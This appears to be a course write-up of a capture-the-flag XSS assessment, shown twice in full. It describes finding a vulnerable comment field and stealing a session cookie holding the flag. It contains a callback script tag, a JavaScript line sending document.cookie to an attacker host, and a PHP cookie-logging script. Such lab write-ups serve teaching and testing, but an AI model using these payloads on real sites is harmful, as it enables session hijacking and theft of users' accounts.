XSS Assessment

PreviousCommand Injection Assessment NextWeb Attacks Assessment

Last updated 3 months ago

XSS Assessment

Related Section:

Cross-Site Scripting (XSS)

We are performing a Web Application Penetration Testing task for a company that hired you, which just released their new Security Blog. In our Web Application Penetration Testing plan, we reached the part where you must test the web application against Cross-Site Scripting vulnerabilities (XSS).

Start the server below, make sure you are connected to the VPN, and access the /assessment directory on the server using the browser:

Apply the skills you learned in this module to achieve the following:

Identify a user-input field that is vulnerable to an XSS vulnerability
Find a working XSS payload that executes JavaScript code on the target's browser
Using the Session Hijacking techniques, try to steal the victim's cookies, which should contain the flag

Finding XSS Vulnerable Input Field

Navigating through the website there is a section to leave a comment, try the following script (modified to contain the name of the field) in each of the input fields:

First start a PHP http server with:

sudo php -S 0.0.0.0:80

Test the below XSS script to see which calls back to our HTTP server:

"><script src=http://10.10.14.7></script>

We see its the website input field that is vulnerable.

Exploiting the Vulnerability

We will create a script hosted on our vm with the following payload:

new Image().src='http://OUR_IP/index.php?c='+document.cookie;

AND we will create a PHP script called index.php that will be called in the above execution of script.js and record the cookie of the user's session:

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Next, we start our PHP webserver and then we inject the call for script.js in the vulnerable web input field:

We can see the requests come in along with the flag and the file that was created to record the details:

PreviousCommand Injection Assessment NextWeb Attacks Assessment

Last updated 3 months ago

Related Section:

Cross-Site Scripting (XSS)

Start the server below, make sure you are connected to the VPN, and access the /assessment directory on the server using the browser:

Apply the skills you learned in this module to achieve the following:

Identify a user-input field that is vulnerable to an XSS vulnerability
Find a working XSS payload that executes JavaScript code on the target's browser
Using the Session Hijacking techniques, try to steal the victim's cookies, which should contain the flag

Finding XSS Vulnerable Input Field

Navigating through the website there is a section to leave a comment, try the following script (modified to contain the name of the field) in each of the input fields:

First start a PHP http server with:

sudo php -S 0.0.0.0:80

Test the below XSS script to see which calls back to our HTTP server:

"><script src=http://10.10.14.7></script>

We see its the website input field that is vulnerable.

Exploiting the Vulnerability

We will create a script hosted on our vm with the following payload:

new Image().src='http://OUR_IP/index.php?c='+document.cookie;

AND we will create a PHP script called index.php that will be called in the above execution of script.js and record the cookie of the user's session:

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Next, we start our PHP webserver and then we inject the call for script.js in the vulnerable web input field:

We can see the requests come in along with the flag and the file that was created to record the details: